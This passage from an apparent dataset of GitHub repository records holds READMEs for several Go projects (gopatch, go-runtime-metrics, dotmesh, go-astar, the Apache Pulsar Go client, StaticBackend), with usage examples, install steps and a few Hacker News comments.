\n\nFor more on transforming statements, see [Patches In Depth/Statements].\n\n [Patches In Depth/Statements]: docs/PatchesInDepth.md#statements\n\n## Elision\n\nMatching a single argument is still too selective and we may want to match a\nwider criteria.\n\nFor this, gopatch supports **elision** of code by adding `...` in many places.\nFor example,\n\n```diff\n@@\n@@\n-foo(...)\n+bar(...)\n```\n\nThe patch above looks for all calls to the function `foo` and replaces them\nwith calls to the function `bar`, regardless of the number of arguments they\nhave.\n\n| Input | Output |\n|----------------------------|----------------------------|\n| `foo(42)` | `bar(42)` |\n| `foo(42, true, 1)` | `bar(42, true, 1)` |\n| `foo(getAnswer(), x(y()))` | `bar(getAnswer(), x(y()))` |\n\nGoing back to the patch from [Statements], we can instead write the following\npatch.\n\n [Statements]: #statements\n\n```diff\n@@\nvar f expression\nvar err identifier\n@@\n-err = f\n-if err != nil {\n+if err := f; err != nil {\n return ..., err\n }\n```\n\nThis patch is almost exactly the same as before except the `return` statement\nwas changed to `return ..., err`. This will allow the patch to operate even on\nfunctions that return multiple values.\n\n\n\n\n\n
**Input:**\n\n```go\nerr = foo()\nif err != nil {\n\treturn false, err\n}\n```\n\n**Output:**\n\n```go\nif err := foo(); err != nil {\n\treturn false, err\n}\n```\n
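Since the `...` in `return ..., err` elides any leading return values, a function that returns more than two values is rewritten the same way. The following snippet is an illustrative sketch, not an example from the gopatch documentation; `store.Lookup(key)` is a hypothetical call used only for illustration:\n\n```go\n// Before: the two leading return values are matched by the elision.\nerr = store.Lookup(key)\nif err != nil {\n\treturn nil, 0, err\n}\n\n// After: the elided return values are reproduced unchanged.\nif err := store.Lookup(key); err != nil {\n\treturn nil, 0, err\n}\n```\n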
\n\nFor more on elision, see [Patches in depth/Elision].\n\n [Patches in depth/Elision]: docs/PatchesInDepth.md#elision\n\n## Comments\n\nPatches come with comments to give more context about what they do.\n\nComments are prefixed by '#'\n\nFor example:\n\n```\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\n# var x is in the metavariable section \nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# We replace time.Now().Sub(x)\n# with time.Since(x)\n```\n\n#### Description comments\n\nDescription comments are comments that appear directly above a patch's first\n`@@` line.\ngopatch will record these descriptions and display them to users with use of\nthe `--diff` or `--print-only` flags.\n\nFor example,\n\n```\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\n# Not a description comment\nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# Not a description comment\n# Not a description comment\n```\n\nPatch files with multiple patches can have a separate description for each\npatch.\n\n```\n# Replace redundant fmt.Sprintf with fmt.Errorf\n@@\n@@\n\n-import \"errors\"\n-errors.New(fmt.Sprintf(...))\n+fmt.Errorf(...)\n\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# Not a description comment\n```\n\nAs these are messages that will be printed to users of the patch,\nwe recommend the following best practices for description comments.\n\n- Keep them short and on a single-line\n- Use imperative mood (\"replace X with Y\", not \"replaces X with Y\")\n\n#### Usage with `--diff`\n\nWhen diff mode is turned on by the `-d`/`--diff` flag, gopatch will print\ndescription comments for patches that matched different files to stderr.\n\n```shell\n$ gopatch -d -p ~/s1028.patch testdata/test_files/diff_example/error.go\nerror.go:Replace redundant fmt.Sprintf with fmt.Errorf\n--- error.go\n+++ error.go\n@@ -7,7 +7,7 @@\n\nfunc foo() error {\n err := errors.New(\"test\")\n- return errors.New(fmt.Sprintf(\"error: %v\", err))\n+ return fmt.Errorf(\"error: %v\", err)\n}\n\n func main() {\n```\n\nNote that gopatch will print only the description comments in diff mode.\nOther comments will be ignored.\n\n# Examples\n\nThis section lists various example patches you can try in your code.\nNote that some of these patches are not perfect and may have false positives.\n\n- [s1012.patch](examples/s1012.patch): Fix for staticcheck [S1012](https://staticcheck.io/docs/checks#S1012).\n- [s1028.patch](examples/s1028.patch): Fix for staticcheck [S1028](https://staticcheck.io/docs/checks#S1028).\n- [s1038.patch](examples/s1038.patch): Fix for staticcheck [S1038](https://staticcheck.io/docs/checks#S1038).\n- [gomock-v1.5.0.patch](examples/gomock-v1.5.0.patch): Drops unnecessary call to `Finish` method for users of gomock.\n- [destutter.patch](examples/destutter.patch): Demonstrates renaming a type and updating its consumers.\n\n# Project status\n\nThe project is currently is in a beta state. It works but significant features\nare planned that may result in breaking changes to the patch format.\n\n## Goals\n\ngopatch aims to be a generic power tool that you can use in lieu of simple\nsearch-and-replace.\n\ngopatch will attempt to do 80% of the work for you in a transformation, but it\ncannot guarantee 100% correctness or completeness. Part of this is owing to\nthe decision that gopatch must be able to operate on code that doesn't yet\ncompile, which can often be the case in the middle of a refactor. 
We may add\nfeatures in the future that require compilable code, but we plan to always\nsupport transformation of partially-valid Go code.\n\n## Known issues\n\nBeyond the known issues highlighted above, there are a handful of other issues\nwith using gopatch today.\n\n- It's very quiet, so there's no indication of progress. [#7]\n- Error messages for invalid patch files are hard to decipher. [#8]\n- Matching elisions between the `-` and `+` sections does not always work in a\n desirable way. We may consider replacing anonymous `...` elision with a\n different named elision syntax to address this issue. [#9]\n- When elision is used, gopatch stops replacing after the first instance in\n the given scope which is often not what you want. [#10]\n- Formatting of output generated by gopatch isn't always perfect.\n\n [#7]: https://github.com/uber-go/gopatch/issues/7\n [#8]: https://github.com/uber-go/gopatch/issues/8\n [#9]: https://github.com/uber-go/gopatch/issues/9\n [#10]: https://github.com/uber-go/gopatch/issues/10\n\n## Upcoming\n\nBesides addressing the various limitations and issues we've already mentioned,\nwe have a number of features planned for gopatch.\n\n- Contextual matching: match context (like a function declaration), and then\n run a transformation inside the function body repeatedly, at any depth. [#11]\n- Collateral changes: Match and capture values in one patch, and use those in\n a following patch in the same file.\n- Metavariable constraints: Specify constraints on metavariables, e.g.\n matching a string, or part of another metavariable.\n- Condition elision: An elision should match only if a specified condition is\n also true.\n\n [#11]: https://github.com/uber-go/gopatch/issues/11\n\n# Contributing\n\nIf you'd like to contribute to gopatch, you may find the following documents\nuseful:\n\n- [HACKING](docs/HACKING.md) documents the architecture, code organization, and\n other information necessary to contribute to the project.\n- [RELEASE](docs/RELEASE.md) documents the process for releasing a new version\n of gopatch.\n\n# Similar Projects\n\n- [rf] is a refactoring tool with a custom DSL\n- [gofmt rewrite rules] support simple transformations on expressions\n- [eg] supports basic example-based refactoring\n- [Coccinelle] is a tool for C from which gopatch takes inspiration heavily\n- [Semgrep] is a cross-language semantic search tool\n- [Comby] is a language-agnostic search and transformation tool\n\n [gofmt rewrite rules]: https://golang.org/cmd/gofmt/\n [eg]: https://godoc.org/golang.org/x/tools/cmd/eg\n [Coccinelle]: https://coccinelle.gitlabpages.inria.fr/website/\n [Semgrep]: https://semgrep.dev/\n [Comby]: https://comby.dev/\n [rf]: https://github.com/rsc/rf\n\n# Credits\n\ngopatch is heavily inspired by [Coccinelle].\n", "readme_type": "markdown", "hn_comments": "I used to work on the team that built this tool, and I've been eagerly awaiting its open source release. Of course, I think it's fantastic :)There's so much interesting work being done on static analysis in Go (semgrep, ruleguard, etc), but I haven't seen similarly powerful refactoring tools. Gopatch is one approach to building a refactoring power tool - I'm excited to start using it, but I hope that it also inspires people (and companies!) 
to build even more capable tools.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bmhatfield/go-runtime-metrics", "link": "https://github.com/bmhatfield/go-runtime-metrics", "tags": ["golang", "runtime", "runtime-metrics", "stats", "statsd", "go"], "stars": 542, "description": "Collect Golang Runtime Metrics, outputting to a stats handler", "lang": "Go", "repo_lang": "", "readme": "# go-runtime-metrics\nCollect Golang Runtime Metrics, outputting to a stats handler (currently, statsd)\n\nThe intent of this library is to be a \"side effect\" import. You can kick off the collector merely by importing this into your main:\n\n`import _ \"github.com/bmhatfield/go-runtime-metrics\"`\n\nThis library has a few optional flags it depends on. It won't be able to output stats until you call `flag.Parse()`, which is generally done in your `func main() {}`.\n\nOnce imported and running, you can expect a number of Go runtime metrics to be sent to statsd over UDP. An example of what this looks like:\n\n![Dashboard Screenshot](/screenshot.png?raw=true)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dotmesh-io/dotmesh", "link": "https://github.com/dotmesh-io/dotmesh", "tags": [], "stars": 541, "description": "dotmesh (dm) is like git for your data volumes (databases, files etc) in Docker and Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# dotmesh: git for data\n\n[![pipeline status](https://gitlab.dotmesh.com/dotmesh/dotmesh/badges/master/pipeline.svg)](https://gitlab.dotmesh.com/dotmesh/dotmesh/commits/master)\n\nDotmesh is a **git-like CLI for capturing, organizing and sharing application states**.\n\nIn other words, it's a **snapshotting tool for databases** and other filesystem states.\n\nThe application states that dotmesh captures are stored in **datadots**.\n\nIt can capture the state of multiple databases, each one in a [subdot](https://docs.dotmesh.com/concepts/what-is-a-datadot/#subdots), in a single atomic commit.\n\n## installing on docker (Mac or Ubuntu 16.04+)\n\nInstall the dotmesh client `dm`:\n\n```plain\nsudo curl -sSL -o /usr/local/bin/dm \\\n https://get.dotmesh.io/$(uname -s)/dm\n```\n\nMake the client binary executable.\n```plain\nsudo chmod +x /usr/local/bin/dm\n```\n\nThen use the client to install `dotmesh-server`, assuming you have Docker installed and your user account has access to the Docker daemon.\n\n```plain\ndm cluster init\n```\n\n```plain\nChecking suitable Docker is installed... yes, got 17.12.0-ce.\nChecking dotmesh isn't running... 
done.\nPulling dotmesh-server docker image...\n[...]\n```\n\nThis will set up a single-instance cluster on your local machine.\n\nVerify that the `dm` client can talk to the `dotmesh-server`:\n```\ndm version\n```\n\nIf the installation fails, please [report an issue](https://github.com/dotmesh-io/dotmesh).\nYou can also experiment in our [online learning environment](https://dotmesh.com/try-dotmesh/).\nThanks!\n\nSee [the installation docs](https://docs.dotmesh.com/install-setup/) for more details, including installing dotmesh on Kubernetes.\n\n\n\n\n## getting started guide\n\nTry our [hosted tutorial](https://dotmesh.com/try-dotmesh/)!\n\nAlternatively, try the [hello Dotmesh on Docker](https://docs.dotmesh.com/tutorials/hello-dotmesh-docker/) guided tutorial.\n\n## what is a datadot?\n\nA **datadot** allows you to capture your application's state and treat it like a `git` repo.\n\nA simple example is to start a PostgreSQL container using a datadot called `myapp`:\n\n```bash\ndocker run -d --volume-driver dm \\\n -v myapp:/var/lib/postgresql/data --name postgres postgres:9.6.6\n```\n\nThis creates a datadot called `myapp`, creates the writeable filesystem for the default `master` branch in that datadot, mounts the writeable filesystem for the `master` branch into `/var/lib/postgresql/data` in the `postgres` container, and starts the `postgres` container, like this:\n\n![myapp dot with master branch and postgres container's /data volume attached](datadot.png \"Diagram of a datadot\")\n\nFirst, switch to it, which, like `cd`'ing into a git repo, makes it the \"current\" dot -- the dot which later `dm` commands will operate on by default:\n\n```bash\ndm switch myapp\n```\n\nYou can then see the `dm list` output:\n\n```bash\ndm list\n```\n\n```plain\n DOT BRANCH SERVER CONTAINERS SIZE COMMITS DIRTY\n* myapp master a1b2c3d /postgres 40.82 MiB 0 40.82 MiB\n```\nThe current branch is shown in the `BRANCH` column and the current dot is marked with a `*` in the `dm list` output.\n\n## what's next?\n\n* Learn more in the [concept docs](https://docs.dotmesh.com/concepts/what-is-a-datadot/).\n* Try another [tutorial](https://docs.dotmesh.com/tutorials/).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "beefsack/go-astar", "link": "https://github.com/beefsack/go-astar", "tags": [], "stars": 541, "description": "Go implementation of the A* search algorithm", "lang": "Go", "repo_lang": "", "readme": "go-astar\n========\n\n**A\\* pathfinding implementation for Go**\n\n[![Build Status](https://travis-ci.org/beefsack/go-astar.svg?branch=master)](https://travis-ci.org/beefsack/go-astar)\n\nThe [A\\* pathfinding algorithm](http://en.wikipedia.org/wiki/A*_search_algorithm) is a pathfinding algorithm noted for its performance and accuracy and is commonly used in game development. It can be used to find short paths for any weighted graph.\n\nA fantastic overview of A\\* can be found at [Amit Patel's Stanford website](http://theory.stanford.edu/~amitp/GameProgramming/AStarComparison.html).\n\nExamples\n--------\n\nThe following crude examples were taken directly from the automated tests. Please see `path_test.go` for more examples.\n\n### Key\n\n* `.` - Plain (movement cost 1)\n* `~` - River (movement cost 2)\n* `M` - Mountain (movement cost 3)\n* `X` - Blocker, unable to move through\n* `F` - From / start position\n* `T` - To / goal position\n* `\u25cf` - Calculated path\n\n### Straight line\n\n```\n.....~...... 
.....~......\n.....MM..... .....MM.....\n.F........T. -> .\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf.\n....MMM..... ....MMM.....\n............ ............\n```\n\n### Around a mountain\n\n```\n.....~...... .....~......\n.....MM..... .....MM.....\n.F..MMMM..T. -> .\u25cf\u25cf\u25cfMMMM\u25cf\u25cf\u25cf.\n....MMM..... ...\u25cfMMM\u25cf\u25cf...\n............ ...\u25cf\u25cf\u25cf\u25cf\u25cf....\n```\n\n### Blocked path\n\n```\n............ \n.........XXX\n.F.......XTX -> No path\n.........XXX\n............\n```\n\n### Maze\n\n```\nFX.X........ \u25cfX.X\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf..\n.X...XXXX.X. \u25cfX\u25cf\u25cf\u25cfXXXX\u25cfX.\n.X.X.X....X. -> \u25cfX\u25cfX.X\u25cf\u25cf\u25cf\u25cfX.\n...X.X.XXXXX \u25cf\u25cf\u25cfX.X\u25cfXXXXX\n.XX..X.....T .XX..X\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\n```\n\n### Mountain climber\n\n```\n..F..M...... ..\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf.\n.....MM..... .....MM...\u25cf.\n....MMMM..T. -> ....MMMM..\u25cf.\n....MMM..... ....MMM.....\n............ ............\n```\n\n### River swimmer\n\n```\n.....~...... .....~......\n.....~...... ....\u25cf\u25cf\u25cf.....\n.F...X...T.. -> .\u25cf\u25cf\u25cf\u25cfX\u25cf\u25cf\u25cf\u25cf..\n.....M...... .....M......\n.....M...... .....M......\n```\n\nUsage\n-----\n\n### Import the package\n\n```go\nimport \"github.com/beefsack/go-astar\"\n```\n\n### Implement Pather interface\n\nAn example implementation is done for the tests in `path_test.go` for the Tile type.\n\nThe `PathNeighbors` method should return a slice of the direct neighbors.\n\nThe `PathNeighborCost` method should calculate an exact movement cost for direct neighbors.\n\nThe `PathEstimatedCost` is a heuristic method for estimating the distance between arbitrary tiles. 
The examples in the test files use [Manhattan distance](http://en.wikipedia.org/wiki/Taxicab_geometry) to estimate orthogonal distance between tiles.\n\n```go\ntype Tile struct{}\n\nfunc (t *Tile) PathNeighbors() []astar.Pather {\n\treturn []astar.Pather{\n\t\tt.Up(),\n\t\tt.Right(),\n\t\tt.Down(),\n\t\tt.Left(),\n\t}\n}\n\nfunc (t *Tile) PathNeighborCost(to astar.Pather) float64 {\n\treturn to.MovementCost\n}\n\nfunc (t *Tile) PathEstimatedCost(to astar.Pather) float64 {\n\treturn t.ManhattanDistance(to)\n}\n```\n\n### Call Path function\n\n```go\n// t1 and t2 are *Tile objects from inside the world.\npath, distance, found := astar.Path(t1, t2)\nif !found {\n\tlog.Println(\"Could not find path\")\n}\n// path is a slice of Pather objects which you can cast back to *Tile.\n```\n\nAuthors\n-------\n\nMichael Alexander \nRobin Ranjit Chauhan \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/pulsar-client-go", "link": "https://github.com/apache/pulsar-client-go", "tags": ["pulsar", "pubsub", "messaging", "streaming", "queuing", "event-streaming", "golang", "go"], "stars": 541, "description": "Apache Pulsar Go Client Library", "lang": "Go", "repo_lang": "", "readme": "\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/apache/pulsar-client-go)](https://pkg.go.dev/github.com/apache/pulsar-client-go)\n[![Go Report Card](https://goreportcard.com/badge/github.com/apache/pulsar-client-go)](https://goreportcard.com/report/github.com/apache/pulsar-client-go)\n[![Language](https://img.shields.io/badge/Language-Go-blue.svg)](https://golang.org/)\n[![LICENSE](https://img.shields.io/hexpm/l/pulsar.svg)](https://github.com/apache/pulsar-client-go/blob/master/LICENSE)\n# Apache Pulsar Go Client Library\n\nA Go client library for [Apache Pulsar](https://pulsar.apache.org/).\n\n## Purpose\n\nThis project is a pure-Go client library for Pulsar that does not\ndepend on the C++ Pulsar library.\n\nOnce feature parity and stability are reached, this will supersede the current\nCGo based library.\n\n## Requirements\n\n- Go 1.18+\n\n> **Note**:\n>\n> While this library should work with Golang versions as early as 1.16, any bugs specific to versions earlier than 1.18 may not be fixed.\n\n## Status\n\nCheck the Projects page at https://github.com/apache/pulsar-client-go/projects for\ntracking the status and the progress.\n\n## Usage\n\nImport the client library:\n\n```go\nimport \"github.com/apache/pulsar-client-go/pulsar\"\n```\n\nCreate a Producer:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{\n URL: \"pulsar://localhost:6650\",\n})\n\ndefer client.Close()\n\nproducer, err := client.CreateProducer(pulsar.ProducerOptions{\n\tTopic: \"my-topic\",\n})\n\n_, err = producer.Send(context.Background(), &pulsar.ProducerMessage{\n\tPayload: []byte(\"hello\"),\n})\n\ndefer producer.Close()\n\nif err != nil {\n fmt.Println(\"Failed to publish message\", err)\n} else {\n fmt.Println(\"Published message\")\n}\n```\n\nCreate a Consumer:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{\n URL: \"pulsar://localhost:6650\",\n})\n\ndefer client.Close()\n\nconsumer, err := client.Subscribe(pulsar.ConsumerOptions{\n Topic: \"my-topic\",\n SubscriptionName: \"my-sub\",\n Type: pulsar.Shared,\n })\n\ndefer consumer.Close()\n\nmsg, err := consumer.Receive(context.Background())\n if err != nil {\n log.Fatal(err)\n }\n\nfmt.Printf(\"Received message msgId: %#v -- content: '%s'\\n\",\n msg.ID(), 
string(msg.Payload()))\n\n```\n\nCreate a Reader:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{URL: \"pulsar://localhost:6650\"})\nif err != nil {\n\tlog.Fatal(err)\n}\n\ndefer client.Close()\n\nreader, err := client.CreateReader(pulsar.ReaderOptions{\n\tTopic: \"topic-1\",\n\tStartMessageID: pulsar.EarliestMessageID(),\n})\nif err != nil {\n\tlog.Fatal(err)\n}\ndefer reader.Close()\n\nfor reader.HasNext() {\n\tmsg, err := reader.Next(context.Background())\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Printf(\"Received message msgId: %#v -- content: '%s'\\n\",\n\t\tmsg.ID(), string(msg.Payload()))\n}\n```\n\n## Build and Test\n\nBuild the sources:\n\n make build\n\nRun the tests:\n\n make test\n\nRun the tests with specific versions of GOLANG and PULSAR:\n\n make test GOLANG_VERSION=1.18 PULSAR_VERSION=2.10.0\n\n## Contributing\n\nContributions are welcomed and greatly appreciated. See [CONTRIBUTING.md](CONTRIBUTING.md) for details on submitting patches and the contribution workflow.\n\n## Community\n\n##### Mailing lists\n\n| Name | Scope | | | |\n|:----------------------------------------------------------|:--------------------------------|:------------------------------------------------------|:----------------------------------------------------------|:-------------------------------------------------------------------|\n| [users@pulsar.apache.org](mailto:users@pulsar.apache.org) | User-related discussions | [Subscribe](mailto:users-subscribe@pulsar.apache.org) | [Unsubscribe](mailto:users-unsubscribe@pulsar.apache.org) | [Archives](http://mail-archives.apache.org/mod_mbox/pulsar-users/) |\n| [dev@pulsar.apache.org](mailto:dev@pulsar.apache.org) | Development-related discussions | [Subscribe](mailto:dev-subscribe@pulsar.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@pulsar.apache.org) | [Archives](http://mail-archives.apache.org/mod_mbox/pulsar-dev/) |\n\n##### Slack\n\nPulsar slack channel `#dev-go` at https://apache-pulsar.slack.com/\n\nYou can self-register at https://apache-pulsar.herokuapp.com/\n\n## License\n\nLicensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0\n\n## Troubleshooting\n\n### Go module 'ambiguous import' error\n\nIf you've upgraded from a previous version of this library, you may run into an 'ambigous import' error when building.\n\n```\ngithub.com/apache/pulsar-client-go/oauth2: ambiguous import: found package github.com/apache/pulsar-client-go/oauth2 in multiple modules\n```\n\nThe fix for this is to make sure you don't have any references in your `go.mod` file to the old oauth2 module path. So remove any lines\nsimilar to the following, and then run `go mod tidy`.\n\n```\ngithub.com/apache/pulsar-client-go/oauth2 v0.0.0-20220630195735-e95cf0633348 // indirect\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "staticbackendhq/core", "link": "https://github.com/staticbackendhq/core", "tags": ["dbaas", "backend-api"], "stars": 541, "description": "Backend server API handling user mgmt, database, storage and real-time component", "lang": "Go", "repo_lang": "", "readme": "

[StaticBackend logo]
\n\np.s. If you'd like to contribute to an active Go project, you've found a nice \none in my biased opinion.\n\n# StaticBackend - simple backend for your apps\n\n[StaticBackend](https://staticbackend.com) is a simple backend API that handles \nuser management, database, file storage, forms, real-time experiences via \nchannel/topic-based communication, and server-side functions for web and mobile \napplications.\n\nYou can think of it as a lightweight Firebase replacement you may self-host. Less \nvendor lock-in, and your data stays in your control.\n\nYou may use its building blocks from one or a combination of:\n\n* Client-side JavaScript\n* Server-side client libraries (Node, Go, Python)\n* Import a Go package directly in your Go programs\n\n### Table of content\n\n* [Import as Go package](#import-as-go-package)\n* [What can you build](#what-can-you-build)\n* [How it works / dev workflow](#how-it-works--dev-workflow)\n* [Get started with the self-hosted version](#get-started-with-the-self-hosted-version)\n* [Documentation](#documentation)\n* [Librairies & CLI](#librairies--cli)\n* [Examples](#examples)\n* [Deploying in production](#deploying-in-production)\n* [Feedback & contributing](#feedback--contributing)\n* [help](#help)\n\n\n## Import as Go package\n\nAs of v1.4.1 StaticBackend offers an importable Go package removing the need \nto self-host the backend API separately while keeping all functionalities from \nyour Go program.\n\n### Installing\n\n```sh\n$ go get github.com/staticbackendhq/core/backend\n```\n\n### Example usage\n\n```go\n// using the cache & pub/sub\nbackend.Cache.Set(\"key\", \"value\")\n\nmsg := model.Command{Type: \"chan_out\", Channel: \"#lobby\", Data: \"hello world\"}\nbackend.Cache.Publish(msg)\n\n// use the generic Collection for strongly-typed CRUD and querying\ntype Task struct {\n\tID string `json:\"id\"`\n\tTitle string `json:\"title\"`\n}\n// auth is the currently authenticated user performing the action.\n// base is the current tenant's database to execute action\n// \"tasks\" is the collection name\ntasks := backend.Collection(auth, base, \"tasks\")\nnewTask, err := tasks.Create(Task{Title: \"testing\"})\n// newTask.ID is filled with the unique ID of the created task in DB\n```\n\nView a [full example in the doc](https://pkg.go.dev/github.com/staticbackendhq/core/backend#example-package).\n\n### Documentation for the `backend` Go package\n\nRefer to the \n[Go documentation](https://pkg.go.dev/github.com/staticbackendhq/core/backend) \nto know about all functions and examples.\n\n## What can you build\n\nI built StaticBackend with the mindset of someone tired of writing the same code \nover and over on the backend. If your application needs one or all of \nuser management, database, file storage, real-time interactions, it should be \na good fit.\n\nI'm personally using it to build SaaS:\n\n[En Pyjama - an online course platform for kids](https://enpyjama.com)\n\nAbandoned projects:\n\n* [Vivid - Automatic video clips for podcasts](https://vivid.fm)\n* [Tangara - one page checkout for creators](https://tangara.io)\n\nIt can be used from client-side and/or server-side.\n\n## How it works / dev workflow\n\nThe main idea is that StaticBackend is your backend API for your applications. 
\nA performant free and open-source self-hosted Firebase alternative.\n\n_Note that it can also be used from your backend code as well._\n\nOnce you have an instance running and your first app created, you may install \nthe JavaScript client-side library:\n\n```shell\n$> npm install @staticbackend/js\n```\n\nLet's create a user account and get a session `token` and create a `task` \ndocument in the `tasks` collection:\n\n```javascript\nimport { Backend } from \"@staticbackend/js\";\n\nconst bkn = new Backend(\"your_public-key\", \"dev\");\n\nlet token = \"\";\n\nlogin = async () => {\n\tconst res = await bkn.register(\"email@test.com\", \"password\");\n\tif (!res.ok) {\n\t\tconsole.error(res.content);\n\t\treturn;\n\t}\n\ttoken = res.content;\n\n\tcreateTask();\n}\n\ncreateTask = async () => {\n\tconst task = {\n\t\tdesc: \"Do something for XYZ\",\n\t\tdone: false\n\t};\n\n\tconst res = bkn.create(token, \"tasks\", task);\n\tif (!res.ok) {\n\t\tconsole.error(res.content);\n\t\treturn;\n\t}\n\tconsole.log(res.content);\n}\n```\n\nThe last `console.log` prints\n\n```json\n{\n\t\"id\": \"123456-unique-id\",\n\t\"accountId\": \"aaa-bbb-unique-account-id\",\n\t\"desc\": \"Do something for XYZ\",\n\t\"done\": false\n}\n```\n\nFrom there you build your application using the \n[database](https://staticbackend.com/docs/database/) CRUD and query functions, \nthe [real-time component](https://staticbackend.com/docs/websocket/),\nthe [storage API](https://staticbackend.com/docs/storage/), etc.\n\nStaticBackend provides commonly used building blocks for web applications.\n\nYou may use server-side libraries for Node, Python and Go or use an HTTP client \nand use your preferred language.\n\n## Get started with the self-hosted version\n\n### Deploy buttons\n\n**Heroku**: Deploy an instance to your Heroku account.\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/staticbackendhq/core)\n\n**Render**: Deploy an instance to your Render account\n\n[![Deploy to Render](https://render.com/images/deploy-to-render-button.svg)](https://render.com/deploy)\n\n### Docker or manual setup\n\n\n[![Get started with self-hosted version](https://img.youtube.com/vi/vQjfaMxidx4/0.jpg)](https://www.youtube.com/watch?v=vQjfaMxidx4)\n\n_Click on the image above to see a video showing how to get started with the \nself-hosted version_.\n\nPlease refer to this [guide here](https://staticbackend.com/getting-started/self-hosting/).\n\nWe also have this \n[blog post](https://staticbackend.com/blog/get-started-self-hosted-version/) \nthat includes the above video.\n\nIf you have Docker & Docker Compose ready, here's how you can have your server \nup and running in dev mode in 30 seconds:\n\n```shell\n$> git clone git@github.com:staticbackendhq/core.git\n$> cd core\n$> cp .demo.env .env\n$> docker build . 
-t staticbackend:latest\n$> docker-compose -f docker-compose-demo.yml up\n```\n\nTest your instance:\n\n```shell\n$> curl -v http://localhost:8099/db/test\n```\n\nYou should get an error as follow:\n\n```shell\n< HTTP/1.1 401 Unauthorized\n< Content-Type: text/plain; charset=utf-8\n< Vary: Origin\n< Vary: Access-Control-Request-Method\n< Vary: Access-Control-Request-Headers\n< X-Content-Type-Options: nosniff\n< Date: Tue, 03 Aug 2021 11:40:15 GMT\n< Content-Length: 33\n< \ninvalid StaticBackend public key\n```\n\nThis is normal, as you're trying to request protected API, but you're all set.\n\nThe next step is to visit [http://localhost:8099](http://localhost:8099) and \ncreate your first app. Please note that in dev mode you'll have to look at your \ndocker compose output terminal to see the content of the email after creating \nyour app. This email contains all the keys and your super user account \ninformation.\n\n## Documentation\n\nWe're trying to have the best experience possible reading our documentation.\n\nPlease help us improve if you have any feedback.\n\n**Documentation with example using our libraries or curl**:\n\n* [Introduction and authentication](https://staticbackend.com/docs/)\n* [User management](https://staticbackend.com/docs/users/)\n* [Social logins (beta)](https://staticbackend.com/docs/social-logins/)\n* [Database](https://staticbackend.com/docs/database/)\n* [Real-time communication](https://staticbackend.com/docs/websocket/)\n* [File storage](https://staticbackend.com/docs/storage/)\n* [Server-side functions](https://staticbackend.com/docs/functions/)\n* [Send emails](https://staticbackend.com/docs/sendmail/)\n* [Caching](https://staticbackend.com/docs/cache/)\n* [Forms](https://staticbackend.com/docs/forms/)\n* [Root token](https://staticbackend.com/docs/root-token/)\n\n## Librairies & CLI\n\nWe [provide a CLI](https://staticbackend.com/getting-started/) for local \ndevelopment if you want to get things started without any infrastructure and \nfor prototyping / testing.\n\nYou can use the CLI to manage your database, form submissions, and deploy \nserver-side-functions. We have an alpha Web UI as well to manage your resources.\n\nWe have a page listing our \n[client-side and server-side libraries](https://staticbackend.com/docs/libraries/).\n\n## Examples\n\nIf you'd like to see specific examples please let us know via the \n[Discussions](https://github.com/staticbackendhq/core/discussions) tab.\n\nHere's the examples we have created so far:\n\n* [To-do list example](https://staticbackend.com/getting-started/)\n* [Realtime collaboration](https://staticbackend.com/blog/realtime-collaboration-example/)\n* [Live chat using server-side function & real-time component](https://staticbackend.com/blog/server-side-functions-task-scheduler-example/)\n* [Jamstack Bostom talk](https://www.youtube.com/watch?v=Uf-K6io9p7w)\n\n## Deploying in production\n\nWe've not written anything yet regarding deploying, but once you have the \ncore` built into a binary and have access to either PostgreSQL or MongoDB, and \nRedis in production you should be able to deploy it like any other Go server.\n\nWe'll have documentation and an example soon for deploying to DigitalOcean.\n\n## Feedback & contributing\n\nIf you have any feedback (good or bad) we'd be more than happy to talk. Please \nuse the [Discussions](https://github.com/staticbackendhq/core/discussions) tab.\n\nSame for contributing. The easiest is to get in touch first. We're working \nto make it easier to contribute code. 
If you'd like to work on something \nprecise let us know.\n\nHere are videos made specifically for people wanting to contribute:\n\n* [Intro, setup, running tests, project structure](https://youtu.be/uTj7UEbg0p4)\n* [backend package and v1.4.1 refactor and changes](https://youtu.be/oWxk2g2yp_g)\n\nCheck the [contributing file](CONTRIBUTING.md) for details.\n\n\n## Help\n\nIf you're looking to help the project, here are some ways:\n\n* Use it and share your experiences.\n* Sponsor the development via GitHub sponsors.\n* Spread the words, a tweet, a blog post, any mention is helpful.\n* Join the [Discord](https://discord.gg/vgh2PTp9ZB) server.\n", "readme_type": "markdown", "hn_comments": "Hey,I'm switching my SaaS StaticBackend to an open-source model.As a developer tool, I think it might have a better chance of getting initial traction as a fully open-source project. I picked the MIT license. I'm hoping to discover its actual potential.I've built it with Go. It's a backend that handles user management, database, forms, and real-time communication.My goal was and still is to have a lightweight Firebase without the vendor lock-in. Self-hosting the open-source version will enable total control over who owns the data and whatnot.Any feedback is 